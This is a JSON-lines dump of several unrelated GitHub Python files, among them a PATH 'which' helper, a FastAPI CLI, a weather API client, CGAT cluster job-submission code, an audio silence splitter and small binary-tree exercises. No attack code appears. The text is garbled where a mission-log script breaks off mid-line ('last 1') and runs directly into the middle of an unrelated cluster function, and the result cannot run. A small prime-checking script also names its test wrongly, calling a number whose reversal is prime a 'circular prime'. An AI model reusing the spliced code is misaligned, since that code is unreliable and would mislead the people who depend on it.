PARTICULAR PURPOSE AND NONINFRINGEMENT.\r\n# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY\r\n# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,\r\n# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE\r\n# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\r\n# \r\n\r\nimport getopt\r\nimport stat\r\n\r\n#---- exceptions\r\n\r\nclass WhichError(Exception):\r\n    pass\r\n\r\n#---- internal support stuff\r\n\r\ndef _getRegisteredExecutable(exeName):\r\n    \"\"\"Windows allows application paths to be registered in the registry.\"\"\"\r\n    registered = None\r\n    if sys.platform.startswith('win'):\r\n        if os.path.splitext(exeName)[1].lower() != '.exe':\r\n            exeName += '.exe'\r\n        import _winreg\r\n        try:\r\n            key = \"SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\App Paths\\\\\" +\\\r\n                  exeName\r\n            value = _winreg.QueryValue(_winreg.HKEY_LOCAL_MACHINE, key)\r\n            registered = (value, \"from HKLM\\\\\"+key)\r\n        except _winreg.error:\r\n            pass\r\n        if registered and not os.path.exists(registered[0]):\r\n            registered = None\r\n    return registered\r\n\r\ndef _samefile(fname1, fname2):\r\n    if sys.platform.startswith('win'):\r\n        return ( os.path.normpath(os.path.normcase(fname1)) ==\\\r\n            os.path.normpath(os.path.normcase(fname2)) )\r\n    else:\r\n        return os.path.samefile(fname1, fname2)\r\n\r\ndef _cull(potential, matches, verbose=0):\r\n    \"\"\"Cull inappropriate matches. Possible reasons:\r\n    - a duplicate of a previous match\r\n    - not a disk file\r\n    - not executable (non-Windows)\r\n    If 'potential' is approved it is returned and added to 'matches'.\r\n    Otherwise, None is returned.\r\n    \"\"\"\r\n    for match in matches: # don't yield duplicates\r\n        if _samefile(potential[0], match[0]):\r\n            if verbose:\r\n                sys.stderr.write(\"duplicate: %s (%s)\\n\" % potential)\r\n            return None\r\n    else:\r\n        if not stat.S_ISREG(os.stat(potential[0]).st_mode):\r\n            if verbose:\r\n                sys.stderr.write(\"not a regular file: %s (%s)\\n\" % potential)\r\n        elif sys.platform != \"win32\" \\\r\n             and not os.access(potential[0], os.X_OK):\r\n            if verbose:\r\n                sys.stderr.write(\"no executable access: %s (%s)\\n\"\\\r\n                                 % potential)\r\n        else:\r\n            matches.append(potential)\r\n            return potential\r\n\r\n#---- module API\r\n\r\ndef whichgen(command, path=None, verbose=0, exts=None):\r\n    \"\"\"Return a generator of full paths to the given command.\r\n    \r\n    \"command\" is the name of the executable to search for.\r\n    \"path\" is an optional alternate path list to search. The default is\r\n        to use the PATH environment variable.\r\n    \"verbose\", if true, will cause a 2-tuple to be returned for each\r\n        match. The second element is a textual description of where the\r\n        match was found.\r\n    \"exts\" optionally allows one to specify a list of extensions to use\r\n        instead of the standard list for this system. This can\r\n        effectively be used as an optimization to, for example, avoid\r\n        stat's of \"foo.vbs\" when searching for \"foo\" and you know it is\r\n        not a VisualBasic script but \".vbs\" is on PATHEXT. 
This option\r\n    is only supported on Windows.\r\n\r\n    This method returns a generator which yields either full paths to\r\n    the given command or, if verbose, tuples of the form (<fullpath>, <where it was found>).\r\n    \"\"\"\r\n    matches = []\r\n    if path is None:\r\n        usingGivenPath = 0\r\n        path = os.environ.get(\"PATH\", \"\").split(os.pathsep)\r\n        if sys.platform.startswith(\"win\"):\r\n            path.insert(0, os.curdir) # implied by Windows shell\r\n    else:\r\n        usingGivenPath = 1\r\n\r\n    # Windows has the concept of a list of extensions (PATHEXT env var).\r\n    if sys.platform.startswith(\"win\"):\r\n        if exts is None:\r\n            exts = os.environ.get(\"PATHEXT\", \"\").split(os.pathsep)\r\n            # If '.exe' is not in exts then this is probably Win9x or a\r\n            # bogus PATHEXT; in that case use a reasonable default.\r\n            for ext in exts:\r\n                if ext.lower() == \".exe\":\r\n                    break\r\n            else:\r\n                exts = ['.COM', '.EXE', '.BAT']\r\n        elif not isinstance(exts, list):\r\n            raise TypeError(\"'exts' argument must be a list or None\")\r\n    else:\r\n        if exts is not None:\r\n            raise WhichError(\"'exts' argument is not supported on \"\\\r\n                             \"platform '%s'\" % sys.platform)\r\n        exts = []\r\n\r\n    # File name cannot have path separators because PATH lookup does not\r\n    # work that way.\r\n    if os.sep in command or os.altsep and os.altsep in command:\r\n        if os.path.exists(command):\r\n            match = _cull((command, \"explicit path given\"), matches, verbose)\r\n            if verbose:\r\n                yield match\r\n            else:\r\n                yield match[0]\r\n    else:\r\n        for i in range(len(path)):\r\n            dirName = path[i]\r\n            # On Windows the dirName *could* be quoted, drop the quotes\r\n            if sys.platform.startswith(\"win\") and len(dirName) >= 2\\\r\n               and dirName[0] == '\"' and dirName[-1] == '\"':\r\n                dirName = dirName[1:-1]\r\n            for ext in exts+['']:\r\n                absName = os.path.abspath(\r\n                    os.path.normpath(os.path.join(dirName, command+ext)))\r\n                if os.path.isfile(absName):\r\n                    if usingGivenPath:\r\n                        fromWhere = \"from given path element %d\" % i\r\n                    elif not sys.platform.startswith(\"win\"):\r\n                        fromWhere = \"from PATH element %d\" % i\r\n                    elif i == 0:\r\n                        fromWhere = \"from current directory\"\r\n                    else:\r\n                        fromWhere = \"from PATH element %d\" % (i-1)\r\n                    match = _cull((absName, fromWhere), matches, verbose)\r\n                    if match:\r\n                        if verbose:\r\n                            yield match\r\n                        else:\r\n                            yield match[0]\r\n        match = _getRegisteredExecutable(command)\r\n        if match is not None:\r\n            match = _cull(match, matches, verbose)\r\n            if match:\r\n                if verbose:\r\n                    yield match\r\n                else:\r\n                    yield match[0]\r\n\r\n\r\ndef which(command, path=None, verbose=0, exts=None):\r\n    \"\"\"Return the full path to the first match of the given command on\r\n    the path.\r\n    \r\n    \"command\" is the name of the executable to search for.\r\n    \"path\" is an optional alternate path list to search. The default is\r\n        to use the PATH environment variable.\r\n    \"verbose\", if true, will cause a 2-tuple to be returned. The second\r\n        element is a textual description of where the match was found.\r\n    \"exts\" optionally allows one to specify a list of extensions to use\r\n        instead of the standard list for this system. This can\r\n        effectively be used as an optimization to, for example, avoid\r\n        stat's of \"foo.vbs\" when searching for \"foo\" and you know it is\r\n        not a VisualBasic script but \".vbs\" is on PATHEXT. 
This option\r\n    is only supported on Windows.\r\n\r\n    If no match is found for the command, a WhichError is raised.\r\n    \"\"\"\r\n    try:\r\n        match = next(whichgen(command, path, verbose, exts))\r\n    except StopIteration:\r\n        raise WhichError(\"Could not find '%s' on the path.\" % command)\r\n    return match\r\n\r\n\r\ndef whichall(command, path=None, verbose=0, exts=None):\r\n    \"\"\"Return a list of full paths to all matches of the given command\r\n    on the path. \r\n\r\n    \"command\" is the name of the executable to search for.\r\n    \"path\" is an optional alternate path list to search. The default is\r\n        to use the PATH environment variable.\r\n    \"verbose\", if true, will cause a 2-tuple to be returned for each\r\n        match. The second element is a textual description of where the\r\n        match was found.\r\n    \"exts\" optionally allows one to specify a list of extensions to use\r\n        instead of the standard list for this system. This can\r\n        effectively be used as an optimization to, for example, avoid\r\n        stat's of \"foo.vbs\" when searching for \"foo\" and you know it is\r\n        not a VisualBasic script but \".vbs\" is on PATHEXT. This option\r\n        is only supported on Windows.\r\n    \"\"\"\r\n    return list( whichgen(command, path, verbose, exts) )\r\n","repo_name":"dividiti/ck-crowdsource-dnn-optimization","sub_path":"program/dnn-desktop-demo/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":21782,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"54"} {"seq_id":"26088716220","text":"import typer\nimport uvicorn\n\nfrom .app import app\nfrom .config import settings\n\ncli = typer.Typer(name=\"project_name API\")\n\n\n@cli.command()\ndef run(\n    port: int = settings.server.port,\n    host: str = settings.server.host,\n    log_level: str = settings.server.log_level,\n    reload: bool = settings.server.reload,\n): # pragma: no cover\n    \"\"\"Run the API server.\"\"\"\n    uvicorn.run(\n        \"project_name.app:app\",\n        host=host,\n        port=port,\n        log_level=log_level,\n        reload=reload,\n    )\n\n\n@cli.command()\ndef shell(): # pragma: no cover\n    \"\"\"Opens an interactive shell with objects auto imported\"\"\"\n    _vars = {\n        \"app\": app,\n        \"settings\": settings,\n    }\n    typer.echo(f\"Auto imports: {list(_vars.keys())}\")\n    try:\n        from IPython import start_ipython\n\n        start_ipython(argv=[], user_ns=_vars)\n    except ImportError:\n        import code\n\n        code.InteractiveConsole(_vars).interact()\n","repo_name":"rochacbruno/fastapi-workshop-template","sub_path":"project_name/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":945,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"54"} {"seq_id":"2181569873","text":"from .api import base_api\nimport os\napiKey = os.environ.get('OPEN_WEATHER_MAP_API_KEY')\n\n\ndef get_lat_lon(city, stateCode, countryCode):\n    if not city or not countryCode:\n        raise Exception('City and Country code must be specified')\n\n    relativeUrl = 'geo/1.0/direct'\n    params = {\n        'q': f'{city},{stateCode},{countryCode}',\n        'limit': 1,\n        'appid': apiKey\n    }\n\n    try:\n        response = base_api.get_with_params(relativeUrl, params)\n        data = response.json()\n\n        if len(data) == 0:\n            raise Exception(\n                f'Failed to retrieve latitude and longitude for {city}')\n\n        return {\n            'lat': data[0]['lat'],\n            'lon': data[0]['lon']\n        }\n    except Exception as error:\n        raise Exception(str(error))\n\n\ndef get_weather_data(lat, lon):\n    if not lat or not lon:\n        raise Exception('Latitude and longitude must be specified')\n\n    try:\n        
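# 'data/2.5/weather' is OpenWeatherMap's current-weather endpoint (an assumption based on its public API docs); lat/lon come from get_lat_lon() above\n        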
relativeUrl = 'data/2.5/weather'\n        params = {\n            'lat': lat,\n            'lon': lon,\n            'appid': apiKey\n        }\n        response = base_api.get_with_params(relativeUrl, params)\n\n        return response.json()\n    except Exception as error:\n        raise Exception(f'Failed to fetch weather data: {str(error)}')\n","repo_name":"oscarcenteno/py_test_automation","sub_path":"api_tests/open_weather_map/questions.py","file_name":"questions.py","file_ext":"py","file_size_in_byte":1275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} {"seq_id":"30555407363","text":"def prime(n):\n    if n < 2:\n        return 0\n    for i in range(2, n//2+1):\n        if n % i == 0:\n            return 0\n    return 1\nn=int(input())\ns=str(n)\nr=int(s[-1::-1])\nif prime(n)==1 and prime(r)==1:\n    print('circular prime')\nelif prime(n)==1 and prime(r)==0:\n    print('prime but not a circular prime')\nelse:\n    print('not prime')","repo_name":"Divyaratnam/codemind-python","sub_path":"circular_prime.py","file_name":"circular_prime.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} {"seq_id":"24643876874","text":"\"\"\"\nGet the current log from the mission from any command line and print it.\nUse the -f option to watch in real time (similar to tail -f on a file)\n\n\"\"\"\n\nimport os\nimport sys\nimport time\nimport requests\n\ntry:\n    from das_constants import CC\nexcept ImportError as e:\n    sys.path.append( os.path.join( os.path.dirname(__file__),\"..\"))\n    sys.path.append( os.path.join( os.path.dirname(__file__),\"../das_framework\"))\n    from das_constants import CC\nimport dashboard\nimport colors\n\ndef print_mission_log(identifier, follow=False, debug=False):\n    url = dashboard.api_url(debug_url=debug) + dashboard.DAS_MISSION_API.format(identifier=identifier)\n    r = requests.get(url)\n    try:\n        row = r.json()[0]\n    except IndexError:\n        print(\"No such mission \",identifier)\n        exit(1)\n    for (k,v) in row.items():\n        print(f\"{k:20} {str(v)[0:60]}\")\n    mission_name = row['mission_name']\n\n    last = 0\n    while follow:\n        r = requests.get(dashboard.api_url() + dashboard.DAS_MISSION_LOG.format(identifier=identifier,last=last))\n        rows = r.json()\n        for row in rows:\n            last 1\n    if multithread:\n        spec.append(\n            \"-pe %(cluster_parallel_environment)s %(job_threads)i -R y\")\n\n        if \"cluster_pe_queue\" in options and multithread:\n            spec.append(\n                \"-q %(cluster_pe_queue)s\")\n        elif len(options['cluster_queue']) > 0:\n            spec.append(\"-q %(cluster_queue)s\")\n\n    elif queue_manager.lower() == \"slurm\":\n\n        # SLURM DOCS:\n        # http://apps.man.poznan.pl/trac/slurm-drmaa\n        # https://computing.llnl.gov/linux/slurm/cons_res_share.html\n        #\n        # The SLURM Consumable Resource plugin is required\n        # The \"CR_CPU_Memory\" resource must be specified\n        #\n        # i.e. 
in slurm.conf:\n        #   SelectType=select/cons_res\n        #   SelectTypeParameters=CR_CPU_Memory\n        #\n        # * Note that --cpus-per-task will actually refer to cores\n        #   with the appropriate Node configuration\n        #\n        # SLURM-DRMAA DOCS - Note that version 1.2 (SVN) is required\n        # http://apps.man.poznan.pl/trac/slurm-drmaa\n        #\n        # Not implemented:\n        # -V: SLURM automatically passes the environment variables\n        # -p: does not appear to be part of the slurm drmaa native spec\n        #\n        # TODO: add \"--account\" (not sure the best way to fill param).\n\n        spec = [\"-J %s\" % job_name]\n\n        if options[\"cluster_options\"]:\n            spec.append(\"%(cluster_options)s\")\n\n        if 'job_threads' in options:\n            job_threads = options[\"job_threads\"]\n        else:\n            job_threads = 1 # probably should come from a config option\n\n        spec.append(\"--cpus-per-task=%s\" % job_threads)\n\n        # Note that the specified memory must be per CPU\n        # for consistency with the implemented SGE approach\n\n        if job_memory.endswith(\"G\"):\n            job_memory_per_cpu = int(job_memory[:-1]) * 1000\n        elif job_memory.endswith(\"M\"):\n            job_memory_per_cpu = int(job_memory[:-1])\n        else:\n            raise ValueError('job memory unit not recognised for SLURM, '\n                             'must be either \"M\" (for Mb) or \"G\" (for Gb),'\n                             ' e.g. 1G or 1000M for 1 Gigabyte of memory')\n\n        spec.append(\"--mem-per-cpu=%s\" % job_memory_per_cpu)\n\n        # set the partition to use (equivalent of SGE queue)\n        spec.append(\"--partition=%(cluster_queue)s\")\n\n    elif queue_manager.lower() == \"torque\":\n\n        # PBS Torque native specification:\n        # http://apps.man.poznan.pl/trac/pbs-drmaa\n\n        spec = [\"-N %s\" % job_name,\n                \"-l mem=%s\" % job_memory, ]\n\n        if options[\"cluster_options\"]:\n            spec.append(\"%(cluster_options)s\")\n\n        # There is no equivalent to sge -V option for pbs-drmaa\n        # recreating this...\n        jt.jobEnvironment = os.environ.copy()\n        jt.jobEnvironment.update({'BASH_ENV': os.path.join(os.environ['HOME'],\n                                                           '.bashrc')})\n\n    elif queue_manager.lower() == \"pbspro\":\n\n        # PBS Pro docs\n        # http://www.pbsworks.com/PBSProduct.aspx?n=PBS-Professional&c=Overview-and-Capabilities\n        # http://technion.ac.il/usg/tamnun/PBSProUserGuide12.1.pdf\n\n        # DRMAA for PBS Pro is the same as for torque:\n        # http://apps.man.poznan.pl/trac/pbs-drmaa\n        # Webpages with some examples:\n        # https://wiki.galaxyproject.org/Admin/Config/Performance/Cluster#PBS\n        # https://sites.google.com/a/case.edu/hpc-upgraded-cluster/home/Software-Guide/pbs-drmaa\n        # https://albertsk.files.wordpress.com/2011/12/pbs.pdf\n\n        # PBS Pro has some differences with torque so separating\n\n        # Set environment variables in .bashrc:\n        # PBS_DRMAA_CONF to eg ~/.pbs_drmaa.conf\n        # DRMAA_LIBRARY_PATH to eg /xxx/libdrmaa.so\n\n        # PBSPro only takes the first 15 characters, throws uninformative error if longer.\n        # mem is maximum amount of RAM used by job; mem_free doesn't seem to be available.\n        # For qsub job requirements would be passed as e.g.\n        #PBS -lselect=N:ncpus=X:mem=Ygb\n        #PBS -lwalltime=HH:00:00\n        # 'select=1' determines the number of nodes. Should go in a config file.\n        # mem is per node and maximum memory\n        # Site dependent but in general setting '#PBS -l select=NN:ncpus=NN:mem=NN{gb|mb}'\n        # is sufficient for parallel jobs (OpenMP, MPI).\n        # Also architecture dependent; jobs could hang if the resource doesn't exist.\n        # TO DO: Kill if long waiting time?\n        nodes = 1 # TO DO: hard coding as unsure of definitions between\n        # threads, nodes, etc. 
between programmes for now\n\n        # Set up basic requirements for job submission:\n        # if process has multiple threads, use a parallel environment:\n        # TO DO: error in fastqc build_report, var referenced before assignment.\n        # For now adding to workaround:\n        if 'job_threads' in options:\n            job_threads = options[\"job_threads\"]\n        else:\n            job_threads = 1\n\n        spec = [\"-N %s\" % job_name[0:15],\n                \"-l select=%s:ncpus=%s:mem=%s\" % (nodes, job_threads, job_memory)]\n\n        # Leaving walltime to be specified by user as difficult to set dynamically and\n        # depends on site/admin configuration of default values. Likely means setting for\n        # longest job with trade-off of longer waiting times for resources to be\n        # available for other jobs.\n        if options[\"cluster_options\"]:\n            conds = ('mem' in options[\"cluster_options\"],\n                     'ncpus' in options[\"cluster_options\"],\n                     'select' in options[\"cluster_options\"]\n                     )\n            if any(conds):\n                spec = [\"-N %s\" % job_name[0:15]]\n                spec.append(\"%(cluster_options)s\")\n            else:\n                spec.append(\"%(cluster_options)s\")\n\n        if \"cluster_pe_queue\" in options and multithread:\n            spec.append(\"-q %(cluster_pe_queue)s\")\n        elif options['cluster_queue'] != \"NONE\":\n            spec.append(\"-q %(cluster_queue)s\")\n        # TO DO: sort out in Parameters.py to allow none values for configparser:\n        elif options['cluster_queue'] == \"NONE\":\n            pass\n\n        # As for torque, there is no equivalent to sge -V option for pbs-drmaa:\n        jt.jobEnvironment = os.environ.copy()\n        jt.jobEnvironment.update({'BASH_ENV': os.path.join(os.environ['HOME'],\n                                                           '.bashrc')})\n\n    else:\n        raise ValueError(\"Queue manager %s not supported\" % queue_manager)\n\n    jt.nativeSpecification = \" \".join(spec) % options\n\n    # keep stdout and stderr separate\n    jt.joinFiles = False\n\n    return jt\n\n\ndef setDrmaaJobPaths(job_template, job_path):\n    '''Adds the job_path, stdout_path and stderr_paths\n    to the job_template.\n    '''\n    job_path = os.path.abspath(job_path)\n\n    os.chmod(job_path, stat.S_IRWXG | stat.S_IRWXU)\n\n    stdout_path = job_path + \".stdout\"\n    stderr_path = job_path + \".stderr\"\n\n    job_template.remoteCommand = job_path\n    job_template.outputPath = \":\" + stdout_path\n    job_template.errorPath = \":\" + stderr_path\n\n    return job_template, stdout_path, stderr_path\n\n\ndef expandStatement(statement, ignore_pipe_errors=False):\n    '''add generic commands before and after statement.\n\n    The prefixes and suffixes added are defined in :data:`exec_prefix`\n    and :data:`exec_suffix`. The main purpose of these prefixes is to\n    provide error detection code to detect errors at early steps in a\n    series of unix commands within a pipe.\n\n    Arguments\n    ---------\n    statement : string\n        Command line statement to expand\n    ignore_pipe_errors : bool\n        If True, do not modify the statement.\n\n    Returns\n    -------\n    statement : string\n        The expanded statement.\n\n    '''\n\n    _exec_prefix = '''detect_pipe_error_helper()\n    {\n    while [ \"$#\" != 0 ] ; do\n        # there was an error in at least one program of the pipe\n        if [ \"$1\" != 0 ] ; then return 1 ; fi\n        shift 1\n    done\n    return 0\n    }\n    detect_pipe_error() {\n    detect_pipe_error_helper \"${PIPESTATUS[@]}\"\n    return $?\n    }\n    checkpoint() {\n        detect_pipe_error;\n        if [ $? 
!= 0 ]; then exit 1; fi;\n    }\n    '''\n\n    _exec_suffix = \"; detect_pipe_error\"\n\n    if ignore_pipe_errors:\n        return statement\n    else:\n        return \" \".join((_exec_prefix, statement, _exec_suffix))\n\n\ndef collectSingleJobFromCluster(session, job_id,\n                                statement,\n                                stdout_path, stderr_path,\n                                job_path,\n                                ignore_errors=False):\n    '''runs a single job on the cluster.'''\n    try:\n        retval = session.wait(\n            job_id, drmaa.Session.TIMEOUT_WAIT_FOREVER)\n    except Exception as msg:\n        # ignore message 24 in PBS (\"code 24: drmaa: Job\n        # finished but resource usage information and/or\n        # termination status could not be provided.\")\n\n        if not msg.message.startswith(\"code 24\"):\n            raise\n        retval = None\n\n    stdout, stderr = getStdoutStderr(stdout_path, stderr_path)\n\n    if retval and retval.exitStatus != 0 and not ignore_errors:\n        raise OSError(\n            \"---------------------------------------\\n\"\n            \"Child was terminated by signal %i: \\n\"\n            \"The stderr was: \\n%s\\n%s\\n\"\n            \"-----------------------------------------\" %\n            (retval.exitStatus,\n             \"\".join(stderr), statement))\n\n    if (retval is not None and\n            (retval.hasExited is False or retval.wasAborted is True) and not\n            ignore_errors):\n\n        raise OSError(\n            \"-------------------------------------------------\\n\"\n            \"Cluster job was aborted (%s) and/or failed to exit (%s) \"\n            \"while running the following statement:\\n\"\n            \"\\n%s\\n\"\n            \"(Job may have been cancelled by the user or the scheduler)\\n\"\n            \"----------------------------------------------------------\\n\" %\n            (retval.wasAborted, not retval.hasExited, statement))\n\n    try:\n        os.unlink(job_path)\n    except OSError:\n        E.warn(\n            (\"temporary job file %s not present for \"\n             \"clean-up - ignored\") % job_path)\n\n\ndef getStdoutStderr(stdout_path, stderr_path, tries=5):\n    '''get stdout/stderr allowing for some lag.\n\n    Try at most *tries* times. 
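Each retry sleeps one second, so each stream is polled for at most *tries* seconds. 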
If unsuccessful, raise OSError\n\n    Removes the files once they are read.\n\n    Returns tuple of stdout and stderr.\n    '''\n    x = tries\n    while x >= 0:\n        if os.path.exists(stdout_path):\n            break\n        time.sleep(1)\n        x -= 1\n\n    x = tries\n    while x >= 0:\n        if os.path.exists(stderr_path):\n            break\n        time.sleep(1)\n        x -= 1\n\n    try:\n        stdout = open(stdout_path, \"r\").readlines()\n    except IOError as msg:\n        E.warn(\"could not open stdout: %s\" % msg)\n        stdout = []\n\n    try:\n        stderr = open(stderr_path, \"r\").readlines()\n    except IOError as msg:\n        E.warn(\"could not open stderr: %s\" % msg)\n        stderr = []\n\n    try:\n        os.unlink(stdout_path)\n        os.unlink(stderr_path)\n    except OSError as msg:\n        pass\n\n    return stdout, stderr\n","repo_name":"CGATOxford/CGATPipelines","sub_path":"CGATPipelines/Pipeline/Cluster.py","file_name":"Cluster.py","file_ext":"py","file_size_in_byte":13638,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"54"} {"seq_id":"19185188996","text":"from pydub import AudioSegment\r\nfrom pydub.silence import split_on_silence\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport scipy.io.wavfile as sp\r\n\r\nsound_file = AudioSegment.from_wav(\"xyz.wav\")\r\naudio_chunks = split_on_silence(sound_file,\r\n    # must be silent for at least 20 ms\r\n    min_silence_len=20,\r\n\r\n    # consider it silent if quieter than -40 dBFS\r\n    silence_thresh=-40,\r\n\r\n    keep_silence= 50\r\n)\r\n\r\nprint(type(sound_file))\r\n\r\nf,d = sp.read(\"xyz.wav\")\r\nplt.plot(d)\r\nplt.show()\r\nfor i, chunk in enumerate(audio_chunks):\r\n\r\n    out_file = \"chunk{0}.wav\".format(i)\r\n    print(\"exporting\", out_file)\r\n    chunk.export(out_file, format=\"wav\")\r\n\r\nprint(audio_chunks)","repo_name":"meghbhalerao/lip-reading","sub_path":"Audio_Prepocessing/Voice Activity Detection Adaptive.py","file_name":"Voice Activity Detection Adaptive.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} {"seq_id":"10690838807","text":"from bs4 import BeautifulSoup\n\nimport requests\n\nsite=\"https://lms.netacad.com/grade/report/grader/index.php?id=\"\nid=0\nsite=site+str(id)\n\nhtml = requests.get(site).content\n\nsoup=BeautifulSoup(html, 'html.parser')\n\n\nprint(soup.prettify())\n","repo_name":"deividsonokopnik/netacad-scrapper","sub_path":"scrap.py","file_name":"scrap.py","file_ext":"py","file_size_in_byte":237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} {"seq_id":"37772134111","text":"# import __main__ as main\n# from Helper.TimerLogger import CodeTimeLogging\n# fileName = main.__file__\n# fileName = fileName.split('\\\\')[-1]\n\n# CodeTimeLogging(Flag='F', filename=fileName, Tag='Tree', Difficult='Easy')\n\nfrom Datastruct.masterTree import readyTree\n\ntotal = [0]\n\n\ndef greaterTree(root):\n    if not root:\n        return\n    greaterTree(root.rChild)\n    total[0] += root.data\n    root.data = total[0]\n    greaterTree(root.lChild)\n\n\nreadyTree.printTree()\ngreaterTree(readyTree.getHead())\nreadyTree.printTree()\n","repo_name":"Omkar02/FAANG","sub_path":"AZ_LC_538_Convert_BST_to_Greater_Tree.py","file_name":"AZ_LC_538_Convert_BST_to_Greater_Tree.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} {"seq_id":"73415259361","text":"import sys\nfrom itertools import combinations\n\ninput = sys.stdin.readline\n\nN = int(input().rstrip(\"\\n\"))\nstats = 
[list(map(int, input().rstrip(\"\\n\").split(\" \"))) for _ in range(N)]\n\nall_cases = list(combinations([i for i in range(N)], N // 2)) # all possible ways to pick one team of N//2 members\n\nstat_gap = sys.maxsize\nfor i in range(len(all_cases) // 2):\n    # first team\n    a_team = all_cases[i]\n    a_stat = 0\n    for member1 in a_team:\n        for member2 in a_team:\n            a_stat += stats[member1][member2]\n\n    # second team\n    b_team = all_cases[-(i + 1)] # the complementary team sits symmetrically in the combinations list\n    b_stat = 0\n    for member1 in b_team:\n        for member2 in b_team:\n            b_stat += stats[member1][member2]\n\n    stat_gap = min(stat_gap, abs(a_stat - b_stat))\n\nprint(stat_gap)\n","repo_name":"ssun-g/solution","sub_path":"BOJ/python/14889.py","file_name":"14889.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} {"seq_id":"36711292127","text":"\"\"\"\n# !/usr/bin/env 全部\n# -*- coding: utf-8 -*-\n@Time : 2022/4/1 12:07\n@File : HJ103 Redraiment的走法.py\n\"\"\"\n\n\n# HJ103 Redraiment's Walk\n\n\ndef steps(n, nums):\n    \"\"\"\n    Description\n    Redraiment is a master at walking on plum-blossom poles. He may pick any pole as a starting point and walk\n    forward, but only from a lower pole to a higher one. He wants to take as many steps as possible; can you\n    work out the maximum number of steps for him?\n    Data range: 1 <= n <= 200, 1 <= val <= 350\n    :param n:\n    :param nums:\n    :return:\n    \"\"\"\n    # dp[i]: length of the longest increasing subsequence ending at position i\n    dp = [1] * n\n    for i in range(1, n):\n        for j in range(i):\n            if nums[i] > nums[j]:\n                dp[i] = max(dp[i], dp[j]+1)\n\n    max_len = max(dp)\n    print(max_len)\n\n\nsteps(6, [2, 5, 1, 5, 4, 5])\n","repo_name":"linksdl/meta-project-learning_programming_algorithms","sub_path":"牛客-华为机考/2-中等/HJ103 Redraiment的走法.py","file_name":"HJ103 Redraiment的走法.py","file_ext":"py","file_size_in_byte":888,"program_lang":"python","lang":"zh","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} {"seq_id":"15802863696","text":"from http.server import HTTPServer, SimpleHTTPRequestHandler\nfrom jinja2 import Environment, FileSystemLoader, select_autoescape\nimport datetime\nimport pandas as pd\nimport collections\nimport sys\n\n\nFILE_NAME = sys.argv[-1]\nCOLUMN_FILE = [\"Категория\", \"Название\", \"Сорт\", \"Цена\", \"Картинка\", \"Акция\"]\nCOLUMN_RENAME = {\n    \"Категория\":\"category\",\n    \"Название\":\"name\",\n    \"Сорт\":\"sort\",\n    \"Цена\":\"price\",\n    \"Картинка\":\"img\",\n    \"Акция\":\"sale\"\n    }\n\ndef get_age():\n    event1 = datetime.datetime(year=1920, month=12, day=31)\n    event2 = datetime.datetime.now()\n    age_winery = (event2.year - event1.year)\n    return age_winery\n\n\ndef fetch_dict_wines():\n    data_exel_df = pd.read_excel(f\"{FILE_NAME}.xlsx\",\n                                 sheet_name='Лист1',\n                                 usecols=COLUMN_FILE,\n                                 na_values=['N/A', 'NA'],\n                                 keep_default_na=False)\n\n    data_exel_df.rename(columns=COLUMN_RENAME,\n                        inplace=True)\n\n    wine_dicts = data_exel_df.to_dict(orient=\"record\")\n    dict_of_lists = collections.defaultdict(list)\n    for wine_description in wine_dicts:\n        key_category = wine_description[\"category\"]\n        dict_of_lists[key_category].append(wine_description)\n    return dict_of_lists\n\n\ndef main():\n    env = Environment(\n        loader=FileSystemLoader('.'),\n        autoescape=select_autoescape(['html', 'xml'])\n    )\n\n    template = env.get_template('template.html')\n    try:\n        rendered_page = template.render(age_winery=get_age(), wines=fetch_dict_wines())\n    except ValueError:\n        print(f\"No sale today\\n{sys.exc_info()[1]}\")\n        COLUMN_FILE.remove(\"Акция\")\n        rendered_page = template.render(age_winery=get_age(), wines=fetch_dict_wines())\n    except Exception:\n        exit(sys.exc_info()[1])\n\n    with open('index.html', 'w', encoding=\"utf8\") as file:\n        
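# write the rendered catalogue to index.html; the HTTP server below serves it from the working directory\n        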
file.write(rendered_page)\n\n    server = HTTPServer(('0.0.0.0', 8000), SimpleHTTPRequestHandler)\n    server.serve_forever()\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"StiffRedson/wine","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} {"seq_id":"42738651390","text":"#!/usr/bin/python\n#-*- coding:utf-8 -*-\n# Author:Sebastian Williams\n\nclass Node:\n    def __init__(self, data):\n        self.data = data\n        self.left = None\n        self.right= None\n\nclass BinarySearchTree:\n    def __init__(self):\n        self.root = None\n\n    def search(self, root, parent, data):\n        \"\"\"Recursive search\"\"\"\n        if root is None:\n            return False, root, parent\n        if root.data == data:\n            return True, root, parent\n        if root.data > data:\n            return self.search(root.left, root, data)\n        else:\n            return self.search(root.right, root, data)\n\n    def insert(self, data):\n        \"\"\"insert data to the tree\"\"\"\n        node = Node(data)\n        if self.root is None:\n            self.root = node\n        flag, n, p = self.search(self.root, self.root, data)\n        if not flag:\n            if data > p.data:\n                p.right= node\n            else:\n                p.left = node\n\n    def find_max(self,root):\n        if root == None:\n            return None\n        else:\n            if root.right == None:\n                return root\n            